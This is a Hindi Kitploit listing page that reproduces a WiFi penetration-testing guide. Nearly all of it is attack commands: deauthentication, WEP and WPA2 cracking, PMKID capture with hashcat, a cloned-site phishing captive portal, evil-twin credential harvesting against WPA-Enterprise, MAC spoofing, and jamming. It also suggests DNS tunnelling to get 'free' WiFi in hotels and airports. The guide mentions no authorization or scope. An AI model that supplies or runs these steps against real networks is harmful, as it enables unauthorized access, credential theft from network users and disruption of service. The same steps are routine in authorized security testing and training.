Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
wifi-pentesting-guide — WiFi प्रवेश परीक्षण मार्गदर्शिका | Kitploit
उपकरण/GitHubGitHub/ricardojoserf/wifi-pentesting-guide
पासवर्ड क्रैकिंगवाई-फाई ऑडिटिंगजानकारी एकत्र करनापोस्ट-शोषणवायरलेस सुरक्षापेनिट्रेशन टेस्टिंगसामाजिक इंजीनियरिंगलर्निंग और शिक्षा
GitHubricardojoserf/wifi-pentesting-guide

wifi-pentesting-guide

WiFi प्रवेश परीक्षण मार्गदर्शिका

रिपॉजिटरी देखें
7341132 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

वाई-फाई पैठ परीक्षण मार्गदर्शिका

अनुक्रमणिका

  1. मूल आदेश

  2. खुले नेटवर्क

    2.1. कैप्टिव पोर्टल

    2.2. मैन-इन-द-मिडिल हमला

  3. WEP क्रैकिंग

    3.1. कोई क्लाइंट नहीं

  4. WPA2-PSK क्रैकिंग

    4.1. 4-तरफा हैंडशेक क्रैक करना

    4.2. PMKID हमला

    4.3. AP-रहित हमला

  5. WPA2-एंटरप्राइज

    5.1. नकली एक्सेस पॉइंट

    5.2. बु्रूट फोर्स

    5.3. समर्थित EAP विधियाँ

  6. अन्य हमले

    6.1. Krack हमला और Frag हमला

    6.2. OSINT

    6.3. वाई-फाई जैमिंग

    6.4. अन्य फ्रेमवर्क

  7. पोस्ट-एक्सप्लॉयटेशन

    7.1. राउटर पर हमला

    7.2. स्कैनर्स के प्रकार

    7.3. स्पूफिंग



1. मूल आदेश

पर्यावरण चर सेट करें

root@kitploit:~
VARIABLE=value

इंटरफ़ेस मोड जांचें

root@kitploit:~
iwconfig $IFACE

इंटरफ़ेस स्थिति जांचें

root@kitploit:~
ifconfig $IFACE

मॉनिटर मोड सेट करें

root@kitploit:~
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up

नेटवर्क सूचीबद्ध करें

  1. मॉनिटर मोड सेट करें

  2. Airodump-ng चलाएं

root@kitploit:~
airodump-ng $IFACE -c $CHANNEL -e $ESSID

डिऑथेंटिकेशन

  1. केवल एक क्लाइंट
root@kitploit:~
 aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
  1. एक एक्सेस पॉइंट (= AP में सभी क्लाइंट)
root@kitploit:~
 aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE

क्लाइंट के साथ छिपा SSID प्राप्त करें

  1. नेटवर्क सूचीबद्ध करें

Airodump-ng का उपयोग करके नेटवर्क सूचीबद्ध करें और AP का MAC पता ($AP_MAC) और क्लाइंट का एक पता ($CLIENT_MAC) प्राप्त करें। कैप्चर को रोकें नहीं।

  1. डिऑथेंटिकेट करें

एक अन्य टर्मिनल में, किसी क्लाइंट या सभी को डिऑथेंटिकेट करें। जब Airodump-ng इस नेटवर्क से हैंडशेक कैप्चर करता है, तो नाम या ESSID पहले टर्मिनल में दिखाई देगा:

root@kitploit:~
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE

क्लाइंट के बिना छिपा SSID प्राप्त करें

  1. नेटवर्क सूचीबद्ध करें

Airodump-ng का उपयोग करके नेटवर्क सूचीबद्ध करें और AP का MAC पता ($AP_MAC) और क्लाइंट का एक पता ($CLIENT_MAC) प्राप्त करें। कैप्चर को रोकें नहीं।

2.a. एक शब्दकोश हमला निष्पादित करें

root@kitploit:~
mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH

2.b. या एक ब्रूटफोर्स हमला निष्पादित करें

root@kitploit:~
mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET

कैरेक्टर सेट के लिए l (लोअरकेस अक्षर), u (अपरकेस अक्षर), n (संख्याएँ), c (लोअरकेस+अपरकेस), m (लोअरकेस+अपरकेस+संख्याएँ) या a (सभी मुद्रित) का उपयोग संभव है।



2. खुले नेटवर्क

2.1. कैप्टिव पोर्टल

2.1.1. नकली कैप्टिव पोर्टल

  1. HTTrack का उपयोग करके एक वेबसाइट क्लोन करें

  2. Wifiphiser इंस्टॉल करें। HTTrack परिणाम को wifiphisher/data/phishing-pages/new_page/html में एक नए फ़ोल्डर में और एक कॉन्फ़िगरेशन फ़ाइल wifiphisher/data/phishing-pages/new_page/config.ini में जोड़ें।

  3. python setup.py install या bin में बाइनरी का उपयोग करके प्रोजेक्ट को पुनः संकलित करें।

  4. hostapd इंस्टॉल करने के बाद यह कमांड नवीनतम Kali रिलीज़ में सही ढंग से काम करता है:

root@kitploit:~
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE

2.1.2. बायपास 1: MAC स्पूफिंग

कैप्टिव पोर्टल को बायपास करने की पहली विधि है अपने MAC पते को पहले से प्रमाणित उपयोगकर्ता के पते में बदलना।

  1. नेटवर्क को स्कैन करें और IP और MAC पतों की सूची प्राप्त करें। आप उपयोग कर सकते हैं:
  • nmap

  • एक कस्टम स्क्रिप्ट जैसे यह (Bash) या यह (Python)

  1. अपने IP और MAC पते बदलें। आप उपयोग कर सकते हैं:
  • macchanger

  • एक कस्टम स्क्रिप्ट जैसे यह(Bash)

साथ ही, आप प्रक्रिया को स्वचालित करने के लिए स्क्रिप्ट का उपयोग कर सकते हैं जैसे:

  • Poliva script

  • Hackcaptiveportals


2.1.3. बायपास 2: DNS टनलिंग

दूसरी विधि DNS टनल बनाना है। इसके लिए, अपना स्वयं का एक सुलभ DNS सर्वर होना आवश्यक है। आप इस विधि का उपयोग कैप्टिव पोर्टल को बायपास करने और होटल, हवाई अड्डों आदि में 'मुफ्त' वाई-फाई प्राप्त करने के लिए कर सकते हैं।

  1. जाँचें कि डोमेन नाम हल हो रहे हैं:
root@kitploit:~
nslookup example.com
  1. 2 DNS रिकॉर्ड बनाएं (Digital ocean, Afraid.org...):
  • एक 'A रिकॉर्ड': dns.$DOMAIN जो $SERVER_IP की ओर इंगित करता है (उदाहरण: dns.domain.com 139.59.172.117)

  • एक 'NS रिकॉर्ड': hack.$DOMAIN जो dns.$DOMAIN की ओर इंगित करता है (उदाहरण: hack.domain.com dns.domain.com)

  1. सर्वर में निष्पादन
root@kitploit:~
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
  1. यहाँ जांचें कि यह सही ढंग से काम करता है

  2. क्लाइंट में निष्पादन

root@kitploit:~
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
  1. टनल बनाएं
root@kitploit:~
ssh -D 8080 [email protected]

2.2. मैन-इन-द-मिडिल हमला

एक बार जब आप नेटवर्क में हों, तो आप परीक्षण कर सकते हैं कि क्या यह मैन-इन-द-मिडिल हमलों के लिए संवेदनशील है।

  1. Ettercap का उपयोग करके ARP स्पूफिंग हमला

  2. Wireshark या TCPdump का उपयोग करके ट्रैफ़िक सूँघें

  3. PCredz (Linux) या Network Miner (Windows) का उपयोग करके ट्रैफ़िक का विश्लेषण करें



3. WEP क्रैकिंग

  1. कैप्चर शुरू करें
root@kitploit:~
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. फ़ेक ऑथेंटिकेशन + ARP रिक्वेस्ट रीप्ले हमला + उपयोगकर्ता को डिऑथेंटिकेट करें का उपयोग करके IV कैप्चर को तेज़ करें। लगभग 100,000 विभिन्न IVs पर Airodump रोकें।
root@kitploit:~
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. Aircrack-ng का उपयोग करके पासवर्ड क्रैक करें
root@kitploit:~
aircrack-ng $PCAP_FILE


4. WPA2-PSK क्रैकिंग

4.1. 4-तरफा हैंडशेक क्रैक करना

  1. कैप्चर शुरू करें
root@kitploit:~
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. एक उपयोगकर्ता को डिऑथेंटिकेट करें। जब आप 'WPA handshake: $MAC' संदेश देखें, तो airodump कैप्चर रोकें।
root@kitploit:~
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. विकल्प 1: Aircrack-ng का उपयोग करके हैंडशेक क्रैक करें
root@kitploit:~
aircrack-ng -w $WORDLIST capture.cap

आप यहाँ से शब्दसूचियाँ प्राप्त कर सकते हैं।

  1. विकल्प 2: Pyrit का उपयोग करके हैंडशेक क्रैक करें
root@kitploit:~
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db

4.2. PMKID हमला

आप इस स्क्रिप्ट का उपयोग कर सकते हैं या इन चरणों का पालन कर सकते हैं:

  1. Hcxdumptool और Hcxtool इंस्टॉल करें (आप इस स्क्रिप्ट का उपयोग कर सकते हैं)।

  2. नेटवर्क मैनेजर रोकें

root@kitploit:~
airmon-ng check kill

3a. यदि आप किसी विशिष्ट MAC पते पर हमला करना चाहते हैं

  • एक टेक्स्ट फ़ाइल ($FILTER_FILE) बनाएं और MAC पता ':' के बिना जोड़ें। आप sed का उपयोग कर सकते हैं और आउटपुट को एक फ़ाइल में रीडायरेक्ट कर सकते हैं:
root@kitploit:~
echo $MAC | sed 's/://g' > $FILTER_FILE
  • PMKID कैप्चर करें
root@kitploit:~
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
  1. $HASH_FILE बनाएं
root@kitploit:~
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE

प्रत्येक पंक्ति की संरचना है: PMKID * राउटर MAC * स्टेशन * ESSID (यहाँ जांचें: https://www.rapidtables.com/convert/number/hex-to-ascii.html)

  1. Hashcat (विकल्प 16800) का उपयोग करके इसे क्रैक करें
root@kitploit:~
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force

4.3. AP-रहित हमला

यदि आपके पास वाई-फाई कनेक्शन चालू वाले क्लाइंट डिवाइस तक पहुंच है लेकिन आसपास कोई नेटवर्क नहीं है, तो भी आप उस नेटवर्क पर हमला कर सकते हैं यदि क्लाइंट डिवाइस पहले उससे जुड़ा है।

इसके लिए, आपको इस जैसी कॉन्फ़िगरेशन फ़ाइल के साथ hostpad का उपयोग करके एक नकली एक्सेस पॉइंट बनाना होगा, जिसमें कोई भी पासवर्ड हो लेकिन वही नेटवर्क नाम हो। नकली नेटवर्क बनाएं, क्लाइंट डिवाइस उससे कनेक्ट होने का प्रयास करेगा और आपको इस गाइड के खंड 4.1 की तरह 4-तरफा हैंडशेक मिलता है।



5. WPA2-एंटरप्राइज

5.1 नकली एक्सेस पॉइंट

वर्चुअल मशीनें डाउनलोड करें

स्थानीय स्थापना

यदि आप वर्चुअल मशीन का उपयोग नहीं करना चाहते हैं, तो आप निम्न का उपयोग करके सब कुछ इंस्टॉल कर सकते हैं:

root@kitploit:~
git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack

cd WPA_Enterprise_Attack && sudo sh install.sh

Hostapd और Freeradius-wpe

एक्सेस पॉइंट प्रारंभ करें इसका उपयोग करके:

root@kitploit:~
sh freeradius_wpe_init.sh $AP_NAME $INTERFACE

जब कोई क्लाइंट कनेक्ट होता है, तो लॉग पढ़ें:

root@kitploit:~
sh freeradius_wpe_read.sh

Hostapd-wpe

root@kitploit:~
sh hostapd_wpe_init.sh $AP_NAME $INTERFACE

5.2 बु्रूट फोर्स

  • Airhammer

5.3 समर्थित EAP विधियाँ

समर्थित EAP विधियाँ खोजें

  • EAP_buster


6. अन्य हमले

6.1. Krack हमला और Frag हमला

ये दो उन्नत हमले हैं जिन्हें महान Mathy Vanhoef ने खोजा है:

  • Krack Attack Scripts - इस वेबसाइट पर समझाया गया

  • Frag Attack Scripts - इस वेबसाइट पर समझाया गया

6.2. OSINT

  • Wigle

6.3. वाई-फाई जैमिंग

  • Wifijammer - यह प्रोग्राम AP और क्लाइंट दोनों को डिऑथेंटिकेशन पैकेट भेज सकता है।

नकली एक्सेस पॉइंट को छोड़कर सभी उपकरणों को डिऑथेंटिकेट करने का एक उदाहरण:

root@kitploit:~
sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC

6.4. अन्य फ्रेमवर्क

Linux:

  • Sniffair
  • Wifi Pumpkin - रोग वाई-फाई एक्सेस पॉइंट हमले के लिए फ्रेमवर्क
  • Eaphammer - नकली एक्सेस पॉइंट्स के लिए फ्रेमवर्क
  • WEF - WPA/WPA2 और WEP के लिए विभिन्न प्रकार के हमलों, स्वचालित हैश क्रैकिंग और अधिक के लिए फ्रेमवर्क

Windows:

  • Acrylic - रीकॉन चरण के लिए उपयोगी
  • Ekahau - वाई-फाई योजना के लिए उपयोगी
  • Vistumbler - वारड्राइविंग के लिए उपयोगी


7. पोस्ट-एक्सप्लॉयटेशन

एक बार जब आप नेटवर्क से जुड़ जाते हैं

7.1. राउटर पर हमला

  • Routersploit - एम्बेडेड डिवाइसों के लिए शोषण फ्रेमवर्क - 'use scanners/autopwn' का परीक्षण करें

7.2. स्कैनर्स के प्रकार

  • Nmap/Zenmap - सुरक्षा स्कैनर, पोर्ट स्कैनर और नेटवर्क अन्वेषण उपकरण

  • Masscan - nmap का तेज़ संस्करण (यह चीजों को तोड़ सकता है, इसलिए सावधान रहें)

  • Netdiscover - ARP सूँघना। यदि नेटवर्क बहुत अच्छी तरह से खंडित हैं तो बहुत उपयोगी

7.3. स्पूफिंग

  • Ettercap - जांचें कि क्या आप MitM हमला कर सकते हैं और नेटवर्क में सभी ट्रैफ़िक सूँघ सकते हैं
टूल डाउनलोड करें
ऑपरेटिंग सिस्टमप्लेटफॉर्मक्रेडेंशियल्सआकारलिंक
Ubuntu 16.04.5VMwarericardojoserf:wifi3.25 GBMEGA
Kali 2019.1VMwareroot:wifi4.99 GBMEGA
Ubuntu 16.04.5VirtualBox (OVA)ricardojoserf:wifi3.18 GBMEGA
Kali 2019.1VirtualBox (OVA)root:wifi5.56 GBMEGA